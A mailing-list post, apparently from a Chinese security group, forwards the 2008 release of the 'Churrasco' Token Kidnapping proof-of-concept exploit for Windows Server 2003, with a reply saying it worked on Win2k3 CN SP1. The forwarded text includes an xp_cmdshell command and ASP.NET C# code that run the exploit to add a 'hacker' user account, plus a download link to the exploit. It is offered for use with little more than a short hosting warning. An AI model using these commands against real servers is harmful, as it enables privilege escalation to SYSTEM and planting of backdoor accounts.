好东西,Win2k3 CN SP1成功
2008/10/9 tr4c3 <[EMAIL PROTECTED]>
>
> It has been a long time since Token Kidnapping presentation (http://
> www.argeniss.com/research/TokenKidnapping.pdf) was published so I
> decided to release a PoC exploit for Win2k3 that alows to execute code
> under SYSTEM account.
>
> Basically if you can run code under any service in Win2k3 then you can
> own Windows, this is because Windows services accounts can
> impersonate.
> Other process (not services) that can impersonate are IIS 6 worker
> processes so if you can run code from an ASP .NET or classic ASP web
> application then you can own Windows too. If you provide shared
> hosting services then I would recomend to not allow users to run this
> kind of code from ASP.
>
>
> -SQL Server is a nice target for the exploit if you are a DBA and want
> to own Windows:
>
> exec xp_cmdshell 'churrasco "net user /add hacker"'
>
>
> -Exploiting IIS 6 with ASP .NET :
> ...
> System.Diagnostics.Process myP = new System.Diagnostics.Process();
> myP.StartInfo.RedirectStandardOutput = true;
> myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
> myP.StartInfo.UseShellExecute = false;
> myP.StartInfo.Arguments= " \"net user /add hacker\" ";
> myP.Start();
> string output = myP.StandardOutput.ReadToEnd();
> Response.Write(output);
> ...
>
>
> You can find the PoC exploit here
> http://www.argeniss.com/research/Churrasco.zip
>
> Enjoy.
> Posted by Cesar Cerrudo at 4:10 PM
>
> >
>
--
BLOG: http://www.blogjava.net/baicker
--~--~---------~--~----~------------~-------~--~----~
要向邮件组发送邮件,请发到 [email protected]
要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---
